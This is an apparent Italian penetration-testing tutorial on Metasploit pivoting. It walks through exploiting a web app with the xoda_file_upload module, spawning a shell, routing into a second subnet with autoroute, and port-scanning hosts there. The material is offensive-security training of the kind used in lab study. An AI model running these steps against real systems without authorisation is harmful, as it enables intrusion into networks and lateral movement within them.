Tutorials

Host Discovery with Pivoting

Metasploit Pivoting e Scansione di Host con Moduli Ausiliari ---

#enumeration#metasploit

Metasploit Pivoting e Scansione di Host con Moduli Ausiliari


1. Avvio di Metasploit e Database

Avviare il database PostgreSQL e Metasploit:

bash
service postgresql start
msfconsole
db_status  # Verifica che il database sia attivo

2. Scansione Iniziale dell'Host

Utilizzare db_nmap per scansionare l'host target e raccogliere informazioni sui servizi:

bash
db_nmap -sV -sC -sS -T4 -O -p80 192.27.190.3

3. Sfruttamento della Vulnerabilità

Selezionare e configurare il modulo di exploit:

bash
use unix/webapp/xoda_file_upload
show options  # Mostra le opzioni disponibili
set <opzioni_necessarie>  # Configurare l'exploit
exploit  # Eseguire l'exploit

4. Ottenere una Shell Interattiva

Dopo aver ottenuto l'accesso alla macchina target:

bash
shell
/bin/bash -i  # Per ottenere una shell interattiva
ifconfig  # Visualizzare le interfacce di rete

Identificare l'altro IP appartenente a una subnet diversa (es. 192.185.27.2).


5. Pivoting con Autoroute

Uscire dalla shell e configurare il pivoting:

bash
run autoroute -s 192.185.27.2  # Aggiungere una route per la subnet remota

Mettere la sessione in background:

bash
background  # Spostare la sessione in background

Ora possiamo eseguire moduli ausiliari sulla subnet dell'host compromesso.


6. Scansione di Porte sulla Subnet Pivotata

#### Scansione delle porte TCP:

bash
search portscan  # Cercare un modulo di port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.185.27.2
run

#### Scansione delle porte UDP:

bash
search udp_sweep  # Cercare un modulo per la scansione UDP
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.185.27.2
run